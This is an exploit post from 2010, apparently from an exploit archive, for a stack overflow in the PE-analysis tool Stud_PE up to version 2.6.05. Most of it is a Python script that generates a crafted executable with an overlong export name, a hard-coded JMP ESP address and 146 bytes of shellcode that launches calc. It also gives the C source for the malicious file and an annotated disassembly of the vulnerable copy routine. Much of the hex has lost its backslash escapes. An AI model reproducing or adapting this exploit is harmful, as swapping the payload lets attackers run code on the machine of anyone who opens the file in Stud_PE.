
Stud_PE <= v2.6.05 Stack Overflow PoC exploit

Posted on 28 March 2010

============================================= Stud_PE <= v2.6.05 Stack Overflow PoC exploit ============================================= ################################################################### # Exploit Title: Stud_PE <= v2.6.05 Stack Overflow PoC exploit # Date: 03/28/2010 # Author: zha0 # Software Link: http://www.cgsoftlabs.ro/studpe.html # Version: Stud_PE <= v2.6.05 # Tested on: Windows XP SP3 CHT # CVE : # Code : # Greetz to : nanika, Catherine & chr00t team ################################################################### #!/usr/bin/python pe_exe=( "x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00" "xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00xB0x00x00x00" "x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68" "x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F" "x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20" "x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00" "xCFxA3x03xDBx8BxC2x6Dx88x8BxC2x6Dx88x8BxC2x6Dx88" "xBDxE4x66x88x8AxC2x6Dx88x74xE2x69x88x8AxC2x6Dx88" "x52x69x63x68x8BxC2x6Dx88x00x00x00x00x00x00x00x00" "x50x45x00x00x4Cx01x01x00x75xCExAEx4Bx00x00x00x00" "x00x00x00x00xE0x00x0Fx01x0Bx01x06x00x00x02x00x00" "x00x00x00x00x00x00x00x00x01x10x00x00x00x10x00x00" "x00x20x00x00x00x00x40x00x00x10x00x00x00x02x00x00" "x04x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00" "x00x20x00x00x00x02x00x00x00x00x00x00x02x00x00x00" "x00x00x10x00x00x10x00x00x00x00x10x00x00x10x00x00" "x00x00x00x00x10x00x00x00x10x10x00x00x47x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x2Ex74x65x78x74x00x00x00" 
"x57x00x00x00x00x10x00x00x00x02x00x00x00x02x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x20x00x00x60" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "xC3xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x75xCExAEx4Bx00x00x00x00x42x10x00x00" "x01x00x00x00x01x00x00x00x01x00x00x00x38x10x00x00" "x3Cx10x00x00x40x10x00x00x00x10x00x00x52x10x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x31x31x31x31x32x32x32x32x33x33x33x33xCEx24xFAx7F" # 0x7FFA24CE JMP ESP Windows XP CHT SP2,SP3 "x90xEBx0Fx5Ex8BxFEx33xC9xB1x7CxACx34x87xAAxE2xFA" # Shellcode : 146 bytes, WinExec("calc"); ExitProcess(0); "xEBx05xE8xECxFFxFFxFFx6Fx8Fx87x87x87x1Fx79x0Dx89" "xF9x5Fx65xF4xDFxD7xD7xEDx85xDExD8xE0xE3x26xB7x87" "x0CxC7x8Bx0CxF7x9Bx2Ax0CxEFx8FxD6x0CxF2xBBx0CxF3" "xA9xFFx84x72xD1x0CxF1xA7x84x72xB4x4ExCExC6x2Ax84" "x42xB4x5Cx88x39x97xBFx75xF3x8Fx46x4Cx8Ax84x5DxC7" "x6Cx76xBCx98xF2x60xD9x0CxD9xA3x84x5AxE1x0Cx8BxCC" "x0CxD9x9Bx84x5Ax0Cx83x0Cx84x42x2CxDEx65x3BxDAxED" "x87x6Fx82x87x87x87xE4xE6xEBxE4x87x78xD2x87xEDx87" "x78xD2x83x00x00x00x00x00x00x00x00x00x00x00x00x00" ) try: rap 
= open("shu.exe",'wb') rap.write(pe_exe) rap.close() print "Exploit file created! " except: print "Error occured!" # ---------------------------------------- ca.c Source --------------------------------------------------------------- # // cl ca.c # #include <windows.h> # # #pragma comment(linker, "/ENTRY:WinMain") # #pragma comment(linker, "/ALIGN:4096 /FILEALIGN:512") # #pragma comment(linker, "/merge:.rdata=.text") # #pragma optimize("gsy", on) # # extern "C" __declspec (dllexport) void junkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkju111122223333444455555(void){} # # int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { return 0; } # # ---------------------------------------- Stack --------------------------------------------------------------------- # 0012F5BC # .... # .... 100h = 256 bytes # .... (contains string " rva: %08X ord: %1d" ..) # .... # 0012F6BC 0012F6EC Pointer to next SEH record # 0012F6C0 00484171 SE handler # 0012F6C4 FFFFFFFF # 0012F6C8 00407C45 RETURN to Stud_PE.00407C45 from Stud_PE.0042F070 # # ---------------------------------------- Stud_PE Code -------------------------------------------------------------- # sub_42F070 # ..... # 0042F4E9 |> B9 40000000 |MOV ECX,40 ; 40*sizeof(DWORD) # 0042F4EE |. 33C0 |XOR EAX,EAX # 0042F4F0 |. 8DBC24 58020000 |LEA EDI,DWORD PTR SS:[ESP+258] # 0042F4F7 |. F3:AB |REP STOS DWORD PTR ES:[EDI] # # 0042F4F9 |. 8B4424 1C |MOV EAX,DWORD PTR SS:[ESP+1C] # 0042F4FD |. 8B0CB0 |MOV ECX,DWORD PTR DS:[EAX+ESI*4] # 0042F500 |. 51 |PUSH ECX # 0042F501 |. 8D8C24 30010000 |LEA ECX,DWORD PTR SS:[ESP+130] # 0042F508 |. E8 A3AFFFFF |CALL Stud_PE.0042A4B0 # # // Copy the export name to stack # 0042F50D |. 50 |PUSH EAX ; /<%s> # 0042F50E |. 
8D9424 5C020000 |LEA EDX,DWORD PTR SS:[ESP+25C] ; | # 0042F515 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s " # 0042F51A |. 52 |PUSH EDX ; |s # 0042F51B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA # 0042F521 |. 83C4 0C |ADD ESP,0C # 0042F524 |> 3B75 18 |CMP ESI,[ARG.5] # 0042F527 |. 75 1B |JNZ SHORT Stud_PE.0042F544 # # 0042F529 |. 68 38B44A00 |PUSH Stud_PE.004AB438 ; /<%s> = "No name" # 0042F52E |. 8D8424 5C020000 |LEA EAX,DWORD PTR SS:[ESP+25C] ; | # 0042F535 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s " # 0042F53A |. 50 |PUSH EAX ; |s # 0042F53B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA # 0042F541 |. 83C4 0C |ADD ESP,0C # # 0042F544 |> 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C] # 0042F548 |. 83C9 FF |OR ECX,FFFFFFFF # 0042F54B |. 33C0 |XOR EAX,EAX # 0042F54D |. 8D9424 58020000 |LEA EDX,DWORD PTR SS:[ESP+258] # 0042F554 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI] # 0042F556 |. F7D1 |NOT ECX # 0042F558 |. 2BF9 |SUB EDI,ECX # 0042F55A |. 50 |PUSH EAX ; /Arg9 => 00000000 # 0042F55B |. 8BF7 |MOV ESI,EDI ; | # 0042F55D |. 8BFA |MOV EDI,EDX ; | # 0042F55F |. 8BD1 |MOV EDX,ECX ; | # 0042F561 |. 83C9 FF |OR ECX,FFFFFFFF ; | # 0042F564 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI] ; | # 0042F566 |. 8BCA |MOV ECX,EDX ; | # 0042F568 |. 4F |DEC EDI ; | # 0042F569 |. C1E9 02 |SHR ECX,2 ; | # 0042F56C |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; | # ........... # # Inj3ct0r.com [2010-03-28]

 
